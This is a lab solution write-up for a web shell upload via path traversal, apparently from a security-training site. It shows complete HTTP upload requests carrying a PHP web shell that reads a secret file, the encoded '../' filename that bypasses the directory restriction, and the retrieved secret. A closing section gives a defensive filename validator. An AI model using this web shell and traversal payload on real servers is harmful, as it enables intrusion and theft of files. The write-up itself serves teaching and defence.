Web shell upload via path traversal

Solution

Log in to PA as user wiener

L: wiener
P: peter

Upload webshell.php

POST /my-account/avatar HTTP/2
Host: 0a4100f1049429828437e5ba002e004f.web-security-academy.net
Cookie: session=VpomqSwEmGnjbmnG7XUZfKvEtqV78t23
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------878108008154649323933677590
Content-Length: 536
Origin: https://0a4100f1049429828437e5ba002e004f.web-security-academy.net
Referer: https://0a4100f1049429828437e5ba002e004f.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------878108008154649323933677590
Content-Disposition: form-data; name="avatar"; filename="webshell.php"
Content-Type: application/x-php

<?php echo file_get_contents('/home/carlos/secret'); ?>


-----------------------------878108008154649323933677590
Content-Disposition: form-data; name="user"

wiener
-----------------------------878108008154649323933677590
Content-Disposition: form-data; name="csrf"

5qFHfXAjWEAQX3wFMDgAQ6gmxIFOpnYf
-----------------------------878108008154649323933677590--

Check output

The application does not execute the code; the file is served back as plain text:
<?php echo file_get_contents('/home/carlos/secret'); ?>
---
view-source:https://0a4100f1049429828437e5ba002e004f.web-security-academy.net/files/avatars/webshell.php

Upload second payload

POST /my-account/avatar HTTP/2
Host: 0a4100f1049429828437e5ba002e004f.web-security-academy.net
Cookie: session=VpomqSwEmGnjbmnG7XUZfKvEtqV78t23
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------878108008154649323933677590
Content-Length: 545
Origin: https://0a4100f1049429828437e5ba002e004f.web-security-academy.net
Referer: https://0a4100f1049429828437e5ba002e004f.web-security-academy.net/my-account?id=wiener
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

-----------------------------878108008154649323933677590
Content-Disposition: form-data; name="avatar"; filename="%2e%2e%2fwebshell.php"
Content-Type: application/x-php

<?php echo file_get_contents('/home/carlos/secret'); ?>


-----------------------------878108008154649323933677590
Content-Disposition: form-data; name="user"

wiener
-----------------------------878108008154649323933677590
Content-Disposition: form-data; name="csrf"

5qFHfXAjWEAQX3wFMDgAQ6gmxIFOpnYf
-----------------------------878108008154649323933677590--

Read output

view-source:https://0a4100f1049429828437e5ba002e004f.web-security-academy.net/files/../webshell.php
---
YCc5TJScH832tyLi7AGhswaYHgT8ENr9

Submit solution
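
The server-side check that would reject both uploads above, as an added example (not code from the lab or from the original write-up). It decodes the client-supplied filename until it stops changing, refuses path separators and traversal segments, and enforces an extension allow-list; `UPLOAD_DIR`, `ALLOWED_EXT` and the function names are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

UPLOAD_DIR = "/var/www/files/avatars"            # assumed storage directory
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}  # assumed avatar allow-list

def extract_filename(part_header: str):
    """Return the raw filename parameter of a multipart part header, or None."""
    m = re.search(r'filename="([^"]*)"', part_header)
    return m.group(1) if m else None

def fully_decode(name: str, max_rounds: int = 5) -> str:
    """Percent-decode repeatedly so single and double encoding both normalise."""
    for _ in range(max_rounds):
        decoded = unquote(name)
        if decoded == name:
            break
        name = decoded
    return name

def check_upload(raw_name: str):
    """Return (accepted, reasons, stored_path) for a client-supplied filename."""
    name = fully_decode(raw_name).replace("\\", "/")
    reasons = []
    if "/" in name or name == "..":
        reasons.append("path separator or traversal sequence")
    if "\x00" in name:
        reasons.append("null byte")
    base = posixpath.basename(name)
    ext = posixpath.splitext(base)[1].lower()
    if ext not in ALLOWED_EXT:
        reasons.append(f"extension {ext or '(none)'} not allowed")
    if reasons:
        return False, reasons, None
    stored = posixpath.normpath(posixpath.join(UPLOAD_DIR, base))
    # Defence in depth: the resolved path must still sit directly in UPLOAD_DIR.
    if posixpath.dirname(stored) != UPLOAD_DIR:
        return False, ["resolved path escapes upload directory"], None
    return True, [], stored

SAMPLES = [  # first two headers are from the requests above; the third is constructed
    'Content-Disposition: form-data; name="avatar"; filename="webshell.php"',
    'Content-Disposition: form-data; name="avatar"; filename="%2e%2e%2fwebshell.php"',
    'Content-Disposition: form-data; name="avatar"; filename="me.png"',
]
if __name__ == "__main__":
    for header in SAMPLES:
        print(extract_filename(header), check_upload(extract_filename(header)))
```

Validation of the name is one layer only; the upload directory and its parents should also be configured so that the web server never executes uploaded files as scripts.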